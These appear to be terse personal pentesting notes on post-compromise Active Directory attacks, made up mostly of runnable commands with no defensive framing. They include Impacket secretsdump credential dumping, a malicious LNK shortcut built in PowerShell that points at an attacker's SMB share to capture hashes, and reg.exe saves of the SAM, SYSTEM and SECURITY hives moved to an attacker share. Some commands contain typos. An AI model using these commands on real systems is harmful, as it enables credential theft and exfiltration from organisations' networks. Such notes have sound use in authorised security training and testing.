Windows Active Directory Pentesting
Post compromise attacks
- kali impacket - secrets dump
impacket-secretsdump DC.LOCAL/USER:'PASSWORD'@$IP- running secretsdump as local:
impacket-secrestsdump -sam sam.save -security security.save -system system.save LOCAL
- Kerberoasting
- ASREPRoasting
- más material
- Cuando comprometemos una cuenta, un ataque para empezar es este.
- Token impersonation attack
- LNK File Attacks:
nxc smb 172.16.139.0/24 -u 'pthorpe' -p creds.txt -M slinky -o SERVER=172.16.139.10 NAME=urgent- Código:
$objShell = New-Object -ComObject WScript.shell $lnk = $objShell.CreateShortcut("C:\test.lnk") $lnk.TargetPath = "\\192.168.138.149\@test.png" $lnk.WindowStyle = 1 $lnk.IconLocation = "%windir%\system32\shell32.dll, 3" $lnk.Description = "Test" $lnk.HotKey = "Ctrl+Alt+T" $lnk.Save()smbserver.py -smb2support "icon" .
Post compromise attack strategy
- 1st
- kerberoasting
- ASREPRoasting
- secretsdump
- pass the hash
- 2nd: big deep
- enum bloodhound
- old vulns
An other post compromise attack strategy
Attacking SAM
- Security Account Manager
Copying SAM Registry Hives
- hklm\sam
- hklm\system
- hklm\security
- We can create backups of these hives using the reg.exe utility.
Using reg.exe save to copy registry hives.
C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save
The operation completed successfully.
C:\WINDOWS\system32> reg.exe save hklm\system C:\system.save
The operation completed successfully.
C:\WINDOWS\system32> reg.exe save hklm\security C:\security.save
The operation completed successfully.
Creating a Share with impacket-smbserver
impacket-smbserver -smb2support shareName someDir
Moving hive copies to share
C:\> move sam.save \\YOUR_KALI_IP\CompData
1 file(s) moved.
C:\> move security.save \\YOUR_KALI_IP\CompData
1 file(s) moved.
C:\> move system.save \\YOUR_KALI_IP\CompData
1 file(s) moved.